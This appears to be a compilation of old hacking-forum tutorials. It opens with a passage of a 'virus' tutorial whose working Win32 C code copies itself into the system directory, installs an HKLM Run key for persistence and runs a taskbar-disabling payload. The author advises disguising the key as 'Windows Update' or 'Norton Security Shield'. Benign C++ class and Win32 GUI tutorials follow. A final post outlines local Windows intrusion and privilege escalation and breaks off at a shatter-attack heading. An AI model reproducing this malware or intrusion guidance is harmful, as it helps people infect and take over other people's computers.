RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.

The next call: hKey is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something less obviously like “Windows Update” or “Norton Security Shield”  anyway be creative. The next zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is the size of the string, this is calculated automatically by using sizeof.

The next call closes the registry key.

Ok add this to you code so it looks something like:
QUOTE
#include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

 return 0;
}

Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key!

Now comes the fun part of writing a virus the payload! This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.

Your code should now look like this with the payload attached:
QUOTE
#include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

 return 0;
}

Although small don’t underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explorer.exe end it. Finally while still in task manager goto file run and type “explorer.exe” without the quotes. If that doesn’t work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though.

That’s it for now I’ll go in depth about Finding Windows and such next time. I’ll also teach you how to kill taskmanager. Keep experimenting there are hundreds of API calls you can use try them out. If you run into an error try and figure out what went wrong 95% of all errors are spelling mistakes.

Keep Programming,
Smith

Contact: got_sasser@hotmail.com

--------------------------


 Hello, I am jackhole, if you do not already know me, and I have been programming C and C++ for 3 years now. In this tutorial, my first, I will teach you how classes work in C++. Now let's begin

What are classes?

Plain and simply classes are a way of organizing data. Classes were introduced to C++ as part of the OOP (object oriented programming) concept. Classes are similar to structures, if you are familiar with structures classes will be of no problem to you.

How do I create a class?

The way you create a class is by using the class keyword. For example if I were going to create a class called test I would use
CODE
class test {
public:

void helloworld()
{
cout << "Hello world";
}
};

This might already start to confuse you, don't worry I will explain.

Essentially every class has to have a set of permission labels, in this case I set the permission label to public; you can have more than one permission label in a class. You might be wondering, what in the heck are permission labels? Let me explain:

The permission label public declare that the members of the class, such as void helloworld() are accessible anywhere the class is visible.
There are other permission labels such as:

private Members of class are only accessible from other members of their own class, like the class test for example.

protected members are accessible from members of their own class, again like test, and also from members of their derived classes.

How do I execute code from a class?
When you are wanting to access variables, or execute code from a class you must create an object of the class. Below is a full working example of how to access the class test, create an object, and execute void helloworld():

CODE
#include <iostream>
using namespace std;
class test {
public:

void helloworld()
{
cout << "Hello world";
}
};

main()
{
    test testing; //create an object of test

    testing.helloworld(); //execute helloworld
}


Wonderful, if everything went according to plan you should have seen "Hello World" appear in the console when you executed the program. In the code you will have seen that I used . between testing and helloworld, basically what that is saying is access helloworld through the class test and execute it.

Using the Scope operator

You are probably asking youself, what in the world is a scope operator. Well basically it looks something like this ::

The scope operator is used to specify the class of which the member belongs. We will take the same class, test, and use the scope operator for void helloworld to declare it a member of test. Below is a full working example of what I am talking about:

CODE
#include <iostream>
using namespace std;
class test {
public:

void helloworld(); //helloworld is a member of the class "test"

};

void test::helloworld() //specify that helloworld is now a member of the class test.
{
    cout << "Hello World";

}

main()
{
    test testing; //create an object of test

    testing.helloworld(); //execute helloworld
}


You should have seen the same thing when you executed it this time, it should have displayed "Hello World" in the console if everything has went according to plan.
Finally, Constructors and Destructors.

A constructor is basically a way of declaring a member with the exact same name as the class. When you create an object of the class the constructor is instantly called. Below is a full example of the use of constructors.

CODE
#include <iostream>
using namespace std;

class test{  //create our class test
    int firstnum, secondnum;

public: //the permission label
    test(int x,int y)  //THE CONSTRUCTOR
    {
        firstnum=x; //declare the firstnum variable is equal to the fist number inputed in the constructor
        secondnum=y; //same as above ^
    }
    int sum()
    {
return (firstnum+secondnum); // add the two numbers and exit the function
    }
};

main()
{
    test testing(5,4); //create an object of test which effectively initializes the constructor
    cout << "The sum of your two numbers is " << testing.sum(); // spit out the sum of the two numbers to the console
}


Simply the way to describe a destructor is its the opposite of a constructor, it frees up allocated memory of the object you created. The destructors have the ~ prefix before their function name.
CODE
#include <iostream>
using namespace std;
class test {
   int *firstnum, *secondnum;
 public:
   test (int,int);
   ~test ();
   int sum() {
        return (*firstnum + *secondnum);
    }
};

test::test (int x, int y) {
 firstnum= new int;
 secondnum = new int;
 *firstnum = x;
 *secondnum = y;
}

test::~test () {
 delete firstnum; //free up the allocated memory of the firstnumber
 delete secondnum; // same as above ^
}


main()
{
    test testing(5,4); //create an object of test which effectively initializes the constructor
    cout << "The sum of your two numbers is " << testing.sum(); // spit out the sum of the two numbers to the console
}


Well this concludes it for my tutorial on classes. If you are having trouble you are free to PM me anytime you please. OOP takes practice. I have just covered the basics, there is more to learn like polymorphism, overloading constructors, abstraction, pointers to classes. Anyway, I am glad you have taken time to read my tutorial on Classes in C++

----------------------------


Help - Search - Members - Calendar
Full Version: C++ Win32 GUI Tutorial Part 2
rohitab.com - Forums > Community > Tutorials
darkblue
Nov 23 2004, 03:32 AM
++++++++++++++++++++++++++++++++++

Topic: C++ Win32 GUI Tutorial Part 2
Written by: darkblue
Date: 22 Nov. 2004

++++++++++++++++++++++++++++++++++

>Introduction:
Before reading this tutorial, it is highly recommended that you browse through Part 1 which can be found here: here and here: here

OK, now let's get started!

>Skeleton of a Win32 proggie:

CODE
#include <windows.h>

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

static char gszClassName[]  = "darkblue";
static HINSTANCE ghInstance = NULL;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
       WNDCLASSEX WndClass;
       HWND hwnd;
       MSG Msg;

       ghInstance = hInstance;

       WndClass.cbSize        = sizeof(WNDCLASSEX);
       WndClass.style         = NULL;
       WndClass.lpfnWndProc   = WndProc;
       WndClass.cbClsExtra    = 0;
       WndClass.cbWndExtra    = 0;
       WndClass.hInstance     = ghInstance;
       WndClass.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
       WndClass.hCursor       = LoadCursor(NULL, IDC_ARROW);
       WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
       WndClass.lpszMenuName  = NULL;
       WndClass.lpszClassName = gszClassName;
       WndClass.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

       if(!RegisterClassEx(&WndClass)) {
               MessageBox(0, "Window Registration Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       hwnd = CreateWindowEx(
               WS_EX_STATICEDGE,
               gszClassName,
               "darkblue owNz!",
               WS_OVERLAPPEDWINDOW,
               CW_USEDEFAULT, CW_USEDEFAULT,
               320, 240,
               NULL, NULL,
               ghInstance,
               NULL);

       if(hwnd == NULL) {
               MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       ShowWindow(hwnd, nCmdShow);
       UpdateWindow(hwnd);

       while(GetMessage(&Msg, NULL, 0, 0)) {
               TranslateMessage(&Msg);
               DispatchMessage(&Msg);
       }
       return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
       switch(Message) {
               case WM_CLOSE:
                       DestroyWindow(hwnd);
                       break;
               case WM_DESTROY:
                       PostQuitMessage(0);
                       break;
               default:
                       return DefWindowProc(hwnd, Message, wParam, lParam);
       }
       return 0;
}


Right, now lets move onto TEXT!
So..... how do we write text to the screen? It isn't very easy nor hard.

CODE
#include <windows.h>

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

static char gszClassName[]  = "darkblue";
static HINSTANCE ghInstance = NULL;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
       WNDCLASSEX WndClass;
       HWND hwnd;
       MSG Msg;

       ghInstance = hInstance;

       WndClass.cbSize        = sizeof(WNDCLASSEX);
       WndClass.style         = NULL;
       WndClass.lpfnWndProc   = WndProc;
       WndClass.cbClsExtra    = 0;
       WndClass.cbWndExtra    = 0;
       WndClass.hInstance     = ghInstance;
       WndClass.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
       WndClass.hCursor       = LoadCursor(NULL, IDC_ARROW);
       WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
       WndClass.lpszMenuName  = NULL;
       WndClass.lpszClassName = gszClassName;
       WndClass.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

       if(!RegisterClassEx(&WndClass)) {
               MessageBox(0, "Error Registering Window!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       hwnd = CreateWindowEx(
               WS_EX_STATICEDGE,
               gszClassName,
               "darkblue owNz!",
               WS_OVERLAPPEDWINDOW,
               CW_USEDEFAULT, CW_USEDEFAULT,
               320, 240,
               NULL, NULL,
               ghInstance,
               NULL);

       if(hwnd == NULL) {
               MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       ShowWindow(hwnd, nCmdShow);
       UpdateWindow(hwnd);

       while(GetMessage(&Msg, NULL, 0, 0)) {
               TranslateMessage(&Msg);
               DispatchMessage(&Msg);
       }
       return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
       HDC hdc;
       PAINTSTRUCT ps;
       LPSTR szMessage = "darkblue 0wNz j00!";

       switch(Message) {
               case WM_PAINT:
                       hdc = BeginPaint(hwnd, &ps);
                       TextOut(hdc, 70, 50, szMessage, strlen(szMessage));
                       EndPaint(hwnd, &ps);
                       break;
               case WM_CLOSE:
                       DestroyWindow(hwnd);
                       break;
               case WM_DESTROY:
                       PostQuitMessage(0);
                       break;
               default:
                       return DefWindowProc(hwnd, Message, wParam, lParam);
       }
       return 0;
}


WHOA! wtf is all that new stuff. All this does is print "darkblue OwNz j00!" to the screen. Not very pretty tongue.gif
Now let's explain. At the top of the WinProc I added a few more variables. HDC identifies the display DC to used
for painting to the screen. PS is out paint structure. The PAINTSTRUCT structure contains information for an
application. This info can be used to paint to the client area of our windows. Message is a simple char array that
holds our message.

After that I added a new case statement. Remember what I said about how UpdateWindow() sends the message WM_PAINT,
well here is where we can use it. Firstly we have to tell the HDC to recieve painting information from BeginPaint().
Now, BeginPaint() takes the following parameters:

hwnd - This identifies the window to be painted to.
pPaint - A pointer to the PAINTSTRUCT structure that will recieve the painting info.

Once we've done that, we can use TextOut() to print to the screen. Now TextOut() takes the following parameters:

hdc - This identifies the device context.
nXStart - Specifies the x-coordinate of the reference point that Windows uses to align the string.
nYStart - Specifies the y-coordinate of the reference point that Windows uses to align the string.
lpString - This points to the string that we want to print.
cbStrng - This specifies the number of chars. in the string.

OK, now for EndPaint(). EndPaint() tells the program that we are done printing to the screen. It takes the following
parameters:

hwnd - This identifies the window that we painted to.
lpPaint - This points to the PAINTSTRUCT structure that we used that contains the painting info. retrieved
by BeginPain().

>Controls:
What are controls? Controls are like child windows such as buttons, checkboxes, edit boxes etc etc. For each new
control that we make we make a new window using CreateWindowEx(), but these are childs of the first main window
and are not new windows.

OK, i've put everything that i could think of together and this is what I came up with:

CODE
#include <windows.h>

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

static char gszClassName[]  = "db Tutorial";
static HINSTANCE ghInstance = NULL;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
       WNDCLASSEX WndClass;
       HWND hwnd;
       MSG Msg;

       ghInstance = hInstance;

       WndClass.cbSize        = sizeof(WNDCLASSEX);
       WndClass.style         = NULL;
       WndClass.lpfnWndProc   = WndProc;
       WndClass.cbClsExtra    = 0;
       WndClass.cbWndExtra    = 0;
       WndClass.hInstance     = ghInstance;
       WndClass.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
       WndClass.hCursor       = LoadCursor(NULL, IDC_ARROW);
       WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
       WndClass.lpszMenuName  = NULL;
       WndClass.lpszClassName = gszClassName;
       WndClass.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

       if(!RegisterClassEx(&WndClass)) {
               MessageBox(0, "Error Registering Window!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       hwnd = CreateWindowEx(
               WS_EX_STATICEDGE,
               gszClassName,
               "darkblue 0wNz j00!",
               WS_OVERLAPPEDWINDOW,
               CW_USEDEFAULT, CW_USEDEFAULT,
               320, 240,
               NULL, NULL,
               ghInstance,
               NULL);

       if(hwnd == NULL) {
               MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       ShowWindow(hwnd, nCmdShow);
       UpdateWindow(hwnd);

       while(GetMessage(&Msg, NULL, 0, 0)) {
               TranslateMessage(&Msg);
               DispatchMessage(&Msg);
       }
       return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
       HWND hButton, hCombo, hEdit, hList, hScroll, hStatic;

       switch(Message) {
               case WM_CREATE:
                       hButton = CreateWindowEx(
                                NULL,
                               "Button",
                               "Button Example",
                               WS_BORDER | WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,
                               0, 0,
                               100, 30,
                               hwnd, NULL,
                               ghInstance,
                               NULL);
                       hCombo  = CreateWindowEx(
                               NULL,
                               "ComboBox",
                               "darkblue",
                               WS_BORDER | WS_CHILD | WS_VISIBLE | CBS_DROPDOWNLIST,
                               0, 30,
                               100, 100,
                               hwnd, NULL,
                               ghInstance,
                               NULL);
                       hEdit   = CreateWindowEx(
                               NULL,
                               "Edit",
                               "edit box example",
                               WS_BORDER | WS_CHILD | WS_VISIBLE,
                               0, 60,
                               100, 30,
                               hwnd, NULL,
                               ghInstance,
                               NULL);
                       hList   = CreateWindowEx(
                               NULL,
                               "ListBox",
                               "db db db",
                               WS_BORDER | WS_CHILD | WS_VISIBLE,
                               100, 0,
                               100, 200,
                               hwnd, NULL,
                               ghInstance,
                               NULL);
                       hScroll = CreateWindowEx(
                               NULL,
                               "ScrollBar",
                               "",
                               WS_BORDER | WS_CHILD | WS_VISIBLE | SBS_VERT,
                               210, 0,
                               100, 200,
                               hwnd, NULL,
                               ghInstance,
                               NULL);
                       hStatic = CreateWindowEx(
                               NULL,
                               "Static",
                               "",
                               WS_BORDER | WS_CHILD | WS_VISIBLE | SS_BLACKRECT,
                               0, 90,
                               100, 30,
                               hwnd, NULL,
                               ghInstance,
                               NULL);
                       break;
               case WM_CLOSE:
                       DestroyWindow(hwnd);
                       break;
               case WM_DESTROY:
                       PostQuitMessage(0);
                       break;
               default:
                       return DefWindowProc(hwnd, Message, wParam, lParam);
       }
       return 0;
}


I have already explained the CreateWindowEx() API so this should be fairly simple. If you don't understand anything,
feel free to contact me OR look it up on google.

>Menus:
When programming there are usually a few ways of doing something, making a menu is no different tongue.gif. I am going
to go over 2 ways of making a menu. Both will do the same thing.

>>Method 1: Making a menu using Resources
From what I have done and seen, using resources to make a menu is one of the easiest things. Basically, the menu
is predefined in a resource file (a file with a .rc extention). The resource files are compiled by the resouce
compiler and linked to the program when the linker is run. This is the first program where I am also going to
throw in additional files besides the source files.

Our header file:

This is our header file. Here we are just defining all the ID's we are going to use so that we can just include
this in both the resource file and in the source file. (Save as tutorial.h)

CODE
#define ID_FILE_NEW           100
#define ID_FILE_OPEN          101
#define ID_FILE_SAVE          102
#define ID_FILE_EXIT          103
#define ID_DO_SOMETHING       104
#define ID_DO_SOMETHING_ELSE  105
#define ID_HELP_ABOUT         106


Our resource file:

This is going to be our resource file. Here we just define the layout of the menus and giving them message
ID's. These message ID's have to be defined in both the resource file and the source file. This is why we use a
header file to define them and then we just include the header file.

CODE
#include "tutorial.h"

ID_MENU MENU DISCARDABLE
BEGIN
       POPUP "&File"
       BEGIN
               MENUITEM "&New",             ID_FILE_NEW
               MENUITEM "&Open",            ID_FILE_OPEN
               MENUITEM "&Save",            ID_FILE_SAVE
               MENUITEM SEPARATOR
               MENUITEM "E&xit",            ID_FILE_EXIT
       END
       POPUP "&Do"
       BEGIN
               MENUITEM "&blaaaa",       ID_DO_SOMETHING
               MENUITEM "lalalalallal",  ID_DO_SOMETHING_ELSE
       END
       POPUP "&Help"
       BEGIN
               MENUITEM "&About db",           ID_HELP_ABOUT
       END
END


Main source file:

CODE
#include <windows.h>
#include "tutorial.h"

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

static char gszClassName[]  = "db";
static HINSTANCE ghInstance = NULL;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
       WNDCLASSEX WndClass;
       HWND hwnd;
       MSG Msg;

       ghInstance = hInstance;

       WndClass.cbSize        = sizeof(WNDCLASSEX);
       WndClass.style         = NULL;
       WndClass.lpfnWndProc   = WndProc;
       WndClass.cbClsExtra    = 0;
       WndClass.cbWndExtra    = 0;
       WndClass.hInstance     = ghInstance;
       WndClass.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
       WndClass.hCursor       = LoadCursor(NULL, IDC_ARROW);
       WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
       WndClass.lpszMenuName  = "ID_MENU";
       WndClass.lpszClassName = gszClassName;
       WndClass.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

       if(!RegisterClassEx(&WndClass)) {
               MessageBox(0, "Window Registration Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       hwnd = CreateWindowEx(
               WS_EX_STATICEDGE,
               gszClassName,
               "db's Menu Tutorial",
               WS_OVERLAPPEDWINDOW,
               CW_USEDEFAULT, CW_USEDEFAULT,
               320, 240,
               NULL, NULL,
               ghInstance,
               NULL);

       if(hwnd == NULL) {
               MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       ShowWindow(hwnd, nCmdShow);
       UpdateWindow(hwnd);

       while(GetMessage(&Msg, NULL, 0, 0)) {
               TranslateMessage(&Msg);
               DispatchMessage(&Msg);
       }
       return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
       switch(Message) {
               case WM_CLOSE:
                       DestroyWindow(hwnd);
                       break;
               case WM_DESTROY:
                       PostQuitMessage(0);
                       break;
               case WM_COMMAND:
                       switch(LOWORD(wParam)) {
                               case ID_FILE_NEW:
                                       MessageBox(hwnd, "You Clicked New File", "Menu", 0);
                                       break;
                               case ID_FILE_OPEN:
                                       MessageBox(hwnd, "Blaaa ... Open File", "Menu", 0);
                                       break;
                               case ID_FILE_SAVE:
                                       MessageBox(hwnd, "Save Save Save", "Menu", 0);
                                       break;
                               case ID_FILE_EXIT:
                                       PostQuitMessage(0);
                               case ID_DO_SOMETHING:
                                       MessageBox(hwnd, "blaaaaaa!", "Menu", 0);
                                       break;
                               case ID_DO_SOMETHING_ELSE:
                                       MessageBox(hwnd, "lalalalllaa", "Menu", 0);
                                       break;
                               case ID_HELP_ABOUT:
                                       MessageBox(hwnd, "db 0wnZ j00!!", "About", 0);
                                       break;
                       }
                       break;
               default:
                       return DefWindowProc(hwnd, Message, wParam, lParam);
       }
       return 0;
}


You see we have changed the "WndClass.lpszMenuName" to what the name of our menu is. There we also added a
WM_COMMAND in our switch statement. This is the message that is posted when a person clicks on a menu item.
The ID of the item is sent with the message. We use LOWORD() to get the message from the lower word of the
32-bit. LOWORD() takes the following parameters:

dwValue - The value to get the lower word from.

>>Method 2: Making a menu on the spot
Using resource menus is great if you want a menu that won't change. But some programs require menu's that can
be changed on the spot! This might be used to add or delete items from the menu or to make some menu items grey.

Header file:

CODE
#define ID_FILE_NEW     100
#define ID_FILE_OPEN          101
#define ID_FILE_SAVE          102
#define ID_FILE_EXIT          103
#define ID_DO_SOMETHING       104
#define ID_DO_SOMETHING_ELSE  105
#define ID_HELP_ABOUT         106


Main source file:

CODE
#include <windows.h>
#include "tutorial.h"

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

static char gszClassName[]  = "db";
static HINSTANCE ghInstance = NULL;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
       WNDCLASSEX WndClass;
       HWND hwnd;
       MSG Msg;
       ghInstance = hInstance;

       WndClass.cbSize        = sizeof(WNDCLASSEX);
       WndClass.style         = NULL;
       WndClass.lpfnWndProc   = WndProc;
       WndClass.cbClsExtra    = 0;
       WndClass.cbWndExtra    = 0;
       WndClass.hInstance     = ghInstance;
       WndClass.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
       WndClass.hCursor       = LoadCursor(NULL, IDC_ARROW);
       WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
       WndClass.lpszMenuName  = NULL;
       WndClass.lpszClassName = gszClassName;
       WndClass.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

       if(!RegisterClassEx(&WndClass)) {
               MessageBox(0, "Window Registration Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       hwnd = CreateWindowEx(
               WS_EX_STATICEDGE,
               gszClassName,
               "db Menu Tutorial",
               WS_OVERLAPPEDWINDOW,
               CW_USEDEFAULT, CW_USEDEFAULT,
               320, 240,
               NULL, NULL,
               ghInstance,
               NULL);

       if(hwnd == NULL) {
               MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
               return 0;
       }

       ShowWindow(hwnd, nCmdShow);
       UpdateWindow(hwnd);

       while(GetMessage(&Msg, NULL, 0, 0)) {
               TranslateMessage(&Msg);
               DispatchMessage(&Msg);
       }
       return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
       HMENU hMenu, hSubMenu;

       switch(Message) {
               case WM_CLOSE:
                       DestroyWindow(hwnd);
                       break;
               case WM_DESTROY:
                       PostQuitMessage(0);
                       break;
               case WM_CREATE:
                       hMenu = CreateMenu();

                       hSubMenu = CreatePopupMenu();
                       AppendMenu(hSubMenu, MF_STRING, ID_FILE_NEW, "&New");
                       AppendMenu(hSubMenu, MF_STRING, ID_FILE_OPEN, "&Open");
                       AppendMenu(hSubMenu, MF_STRING, ID_FILE_SAVE, "&Save");
                       AppendMenu(hSubMenu, MF_SEPARATOR, 0, 0);
                       AppendMenu(hSubMenu, MF_STRING, ID_FILE_EXIT, "E&xit");
                       AppendMenu(hMenu, MF_STRING | MF_POPUP, (UINT)hSubMenu, "&File");

                       hSubMenu = CreatePopupMenu();
                       AppendMenu(hSubMenu, MF_STRING, ID_DO_SOMETHING, "&blaaaa");
                       AppendMenu(hSubMenu, MF_STRING, ID_DO_SOMETHING_ELSE, "lalalalal");
                       AppendMenu(hMenu, MF_STRING | MF_POPUP, (UINT)hSubMenu, "&Do");

                       hSubMenu = CreatePopupMenu();
                       AppendMenu(hSubMenu, MF_STRING, ID_HELP_ABOUT, "&About db");
                       AppendMenu(hMenu, MF_STRING | MF_POPUP, (UINT)hSubMenu, "&Help");

                       SetMenu(hwnd, hMenu);
                       break;
               case WM_COMMAND:
                       switch(LOWORD(wParam)) {
                               case ID_FILE_NEW:
                                       MessageBox(hwnd, "A brand newwwww newww file", "Menu", 0);
                                       break;
                               case ID_FILE_OPEN:
                                       MessageBox(hwnd, "OoOpen a File!", "Menu", 0);
                                       break;
                               case ID_FILE_SAVE:
                                       MessageBox(hwnd, "Save Save save Save", "Menu", 0);
                                       break;
                               case ID_FILE_EXIT:
                                       PostQuitMessage(0);
                               case ID_DO_SOMETHING:
                                       MessageBox(hwnd, "blaaaaa!", "Menu", 0);
                                       break;
                               case ID_DO_SOMETHING_ELSE:
                                       MessageBox(hwnd, "lalalalalalal", "Menu", 0);
                                       break;
                               case ID_HELP_ABOUT:
                                       MessageBox(hwnd, "db definately 0wNz j00!!", "About", 0);
                                       break;
                       }
                       break;
               default:
                       return DefWindowProc(hwnd, Message, wParam, lParam);
       }
       return 0;
}


Righto! At the top you may have noticed that I set "WndClass.lpszMenuName" back to NULL. That is because we are
making the menu on the spot and don't need a resource file. First you might notice we added WM_CREATE to our
switch() statement. This is the message that is sent when our window is first created. We also declare 2 variables
of type HMENU. You see that we set hMenu to CreateMenu(). This will start our whole menu. Then we set hSubMenu
to CreatePopupMenu(). This will make a blank sub menu. Then we need to fill it. You see we call AppendMenu() to
add items to our menu. AppendMenu() takes the following parameters:

hMenu - This identifies the menu bar.
uFlags - This specifies flags to control the appearence and behaviour of our menu item.
ulDNNewItem - This specifies either the identifier of the menu item or if the uFlags parameter is set to
"MF_POPUP", the handle to the drop-down menu or submenu.
lpNewItem - This specifies the content of the new menu item.

After we have done that, we see SetMenu(). This is what actually displays the menu to us. SetMenu() takes the following
parameters:

hWnd - This identifies the window to which the menu is to be assigned to.
hMenu - This identifies the new menu. If it is set to NULL then the windows current menu is removed.

------------------------------------------------

OK, thats it. End of tutorial. Anything else I should cover?

The traditional shout outs to: Xander, Barnzey, dumbtech, soad, njkt, Blademaster, nofrillz, Napster, jackhole and everyone else I missed.

Laters...
darkblue
2004

=-=-EOF=-=-
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2007 Invision Power Services, Inc.


-------------------------------


Help - Search - Members - Calendar
Full Version: Hacking a windows PC
rohitab.com - Forums > Community > Tutorials
nielserman
Nov 23 2004, 07:18 PM
Hacking a windows PC (The Manual)
Blademaster
11/23/2004 20:15

---

Intoduction
=
This tutorial is about hacking windows with local access only! Do not expect to learn how to remotely break into a computer. Everything in this tutorial is based on a windows XP machine.
This tutorial is best viewed in notepad with character loopback on. The writer (Blademaster) is in no way responsible for any acts based upon descriptions in this tutorial. Any mistakes in english are transmission errors the author can't be held responsible for.
=

---

1. Gaining access
=
First thing, we want to gain access to the windows box. I don't want to explain this very thorough, as there are a lot of tutorials already explaining this. The following methods for home PC's badly configured.

1. On win9X, try hitting alt-F4 or close the login window as soon as it comes up. This should get you right into the guest account. An administrator can disable this, so it might not always work.
2. On winNT based systems: Try booting into safemode and use the administator account (unpassworded). The account might be passworded by a system admin.

Other means of getting a password to the PC.

1. Sniffing the network for unencrypted authentication traffic.
2. Social engineering.
3. Trojaning.
4. Brute forcing. (Guessing obvious passwords).
=

---

2. Privilege escalation
=
2.1 Bad configuration
=
On many PC's, bad configuration is very common. Bad configuration can be anything, from guest or non-admin users having privileges they shouldn't have like power to browse vital directory's, to being able to download and install to C:\ or root disk.
=
2.2 Privilege Inheritance
=
Privilege inheritance is about programs getting the same privilege as their spawning parent. A common mistake like this is log viewing in server applications. For example, program X is a server for streaming music, it is run as "Local System" with full privileges. X gives it's users the capability to view log files from the application itself. Hacker Y opens the IDE for the server and presses the "View Logs" button. A nice open dialog shows itself and Y browses to C:\windows\system32\, right clicks cmd.exe and chooses the option "Open". Hacker Y has "Local System" privileges over the computer now because program X forgot to lower the privileges of cmd.exe to the actual user privilege.
This action can also be made with a simple shatter attack to win32hlp.exe's open dialog box.
If a program has a higher privilege then the current user the attacker is on and has some kind of file interaction, it is definetly worth to check for a privilege inheritence attack.
=
2.3 Shatter attacks
=
